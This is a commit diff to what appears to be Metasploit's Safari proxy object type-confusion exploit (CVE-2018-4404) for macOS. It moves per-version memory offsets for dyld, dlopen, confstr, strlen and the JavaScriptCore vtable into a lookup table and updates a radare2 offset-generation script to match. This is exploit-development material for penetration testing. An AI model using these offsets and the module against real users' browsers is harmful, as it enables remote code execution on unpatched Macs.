parent
bee3c3d4d3
commit
57bad6b213
|
@ -66,13 +66,16 @@ You will need to install the latest radare2 for the script to function.
|
|||
```
|
||||
$ git clone https://github.com/radare/radare2 && cd radare2 && ./sys/install.sh && cd ..`
|
||||
$ ruby external/source/exploits/CVE-2018-4404/gen_offsets.rb
|
||||
const DYLD_STUB_LOADER_OFFSET = 0x000012a8;
|
||||
const DLOPEN_OFFSET = 0x00002e60;
|
||||
const CONFSTR_OFFSET = 0x000024fc;
|
||||
const STRLEN_OFFSET = 0x00001440;
|
||||
const STRLEN_GOT_OFFSET = 0xee8;
|
||||
'10.13' => {
|
||||
:dyld_stub_loader => '0x000012a8',
|
||||
:dlopen => '0x00002e60',
|
||||
:confstr => '0x000024fc',
|
||||
:strlen => '0x00001440',
|
||||
:strlen_got => '0xee8',
|
||||
},
|
||||
```
|
||||
|
||||
The offset `:jsc_vtab` cannot be generated but you can guess it is either 0xe000 or 0xd000.
|
||||
You can then add the offsets to the module:
|
||||
`modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb`
|
||||
|
||||
|
|
|
@ -9,10 +9,12 @@ def grab_offset(lib_file, function)
|
|||
offset_string[0..9]
|
||||
end
|
||||
|
||||
puts "const DYLD_STUB_LOADER_OFFSET = #{grab_offset("/usr/lib/system/libdyld.dylib", "dyld_stub_binder")};"
|
||||
puts "const DLOPEN_OFFSET = #{grab_offset("/usr/lib/system/libdyld.dylib", "sym._dlopen")};"
|
||||
puts "const CONFSTR_OFFSET = #{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._confstr")};"
|
||||
puts "const STRLEN_OFFSET = #{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._strlen")};"
|
||||
version = `sw_vers -productVersion`.strip
|
||||
puts " '#{version}' => {"
|
||||
puts " :dyld_stub_loader => '#{grab_offset("/usr/lib/system/libdyld.dylib", "dyld_stub_binder")}',"
|
||||
puts " :dlopen => '#{grab_offset("/usr/lib/system/libdyld.dylib", "sym._dlopen")}',"
|
||||
puts " :confstr => '#{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._confstr")}',"
|
||||
puts " :strlen => '#{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._strlen")}',"
|
||||
|
||||
strlen_disasm = `r2 -2qQ -c "iS | grep nl_symbol_ptr; s sym.imp.strlen; pd 1" /System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore`
|
||||
#strlen_disasm = '''
|
||||
|
@ -23,5 +25,6 @@ strlen_disasm = `r2 -2qQ -c "iS | grep nl_symbol_ptr; s sym.imp.strlen; pd 1" /S
|
|||
got_offset = strlen_disasm.split(" ")[3].to_i(16)
|
||||
strlen_got_entry = strlen_disasm.scan(/\[(\S+)\]/).first.first.to_i(16)
|
||||
strlen_got_offset = (strlen_got_entry - got_offset).to_s(16)
|
||||
puts "const STRLEN_GOT_OFFSET = 0x#{strlen_got_offset};"
|
||||
puts " :strlen_got => '0x#{strlen_got_offset}',"
|
||||
puts " },"
|
||||
|
||||
|
|
|
@ -43,6 +43,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'Mar 15 2018'))
|
||||
end
|
||||
|
||||
def offset_table
|
||||
{
|
||||
'10.12.6' => {
|
||||
:jsc_vtab => '0x0000d8d8',
|
||||
:dyld_stub_loader => '0x00001168',
|
||||
:dlopen => '0x000027f7',
|
||||
:confstr => '0x00002c84',
|
||||
:strlen => '0x00001b40',
|
||||
:strlen_got => '0xdc0',
|
||||
},
|
||||
'10.13' => {
|
||||
:jsc_vtab => '0x0000e5f8',
|
||||
:dyld_stub_loader => '0x000012a8',
|
||||
:dlopen => '0x00002e60',
|
||||
:confstr => '0x000024fc',
|
||||
:strlen => '0x00001440',
|
||||
:strlen_got => '0xee8',
|
||||
},
|
||||
'10.13.3' => {
|
||||
:jsc_vtab => '0xe5e8',
|
||||
:dyld_stub_loader => '0x1278',
|
||||
:dlopen => '0x2e30',
|
||||
:confstr => '0x24dc',
|
||||
:strlen => '0x1420',
|
||||
:strlen_got => '0xee0',
|
||||
},
|
||||
}
|
||||
end
|
||||
|
||||
def exploit_data(directory, file)
|
||||
path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
|
||||
::File.binread path
|
||||
|
@ -66,35 +95,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def get_offsets(user_agent)
|
||||
if user_agent =~ /Intel Mac OS X (.*?)\)/
|
||||
mac_osx_version = Gem::Version.new($1.gsub("_", "."))
|
||||
version = $1.gsub("_", ".")
|
||||
mac_osx_version = Gem::Version.new(version)
|
||||
if mac_osx_version >= Gem::Version.new('10.13.4')
|
||||
print_warning "macOS version #{mac_osx_version} is not vulnerable"
|
||||
elsif mac_osx_version < Gem::Version.new('10.12')
|
||||
print_warning "macOS version #{mac_osx_version} is not vulnerable"
|
||||
elsif mac_osx_version == Gem::Version.new('10.12.6')
|
||||
return '''
|
||||
const JSC_VTAB_OFFSET = 0xd8d8;
|
||||
const DYLD_STUB_LOADER_OFFSET = 0x00001168;
|
||||
const DLOPEN_OFFSET = 0x000027f7;
|
||||
const CONFSTR_OFFSET = 0x00002c84;
|
||||
const STRLEN_OFFSET = 0x00001b40;
|
||||
const STRLEN_GOT_OFFSET = 0xdc0;'''
|
||||
elsif mac_osx_version == Gem::Version.new('10.13')
|
||||
return '''
|
||||
const JSC_VTAB_OFFSET = 0xe5f8;
|
||||
const DYLD_STUB_LOADER_OFFSET = 0x12a8;
|
||||
const STRLEN_GOT_OFFSET = 0xee8;
|
||||
const STRLEN_OFFSET = 0x1440;
|
||||
const CONFSTR_OFFSET = 0x24fc;
|
||||
const DLOPEN_OFFSET = 0x2e60;'''
|
||||
elsif mac_osx_version == Gem::Version.new('10.13.3')
|
||||
return '''
|
||||
const JSC_VTAB_OFFSET = 0xe5e8;
|
||||
const DYLD_STUB_LOADER_OFFSET = 0x1278;
|
||||
const STRLEN_GOT_OFFSET = 0xee0;
|
||||
const STRLEN_OFFSET = 0x1420;
|
||||
const CONFSTR_OFFSET = 0x24dc;
|
||||
const DLOPEN_OFFSET = 0x2e30;'''
|
||||
elsif offset_table.key?(version)
|
||||
offset = offset_table[version]
|
||||
return <<-EOF
|
||||
const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
|
||||
const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
|
||||
const DLOPEN_OFFSET = #{offset[:dlopen]};
|
||||
const CONFSTR_OFFSET = #{offset[:confstr]};
|
||||
const STRLEN_OFFSET = #{offset[:strlen]};
|
||||
const STRLEN_GOT_OFFSET = #{offset[:strlen_got]};
|
||||
EOF
|
||||
else
|
||||
print_warning "No offsets for version #{mac_osx_version}"
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue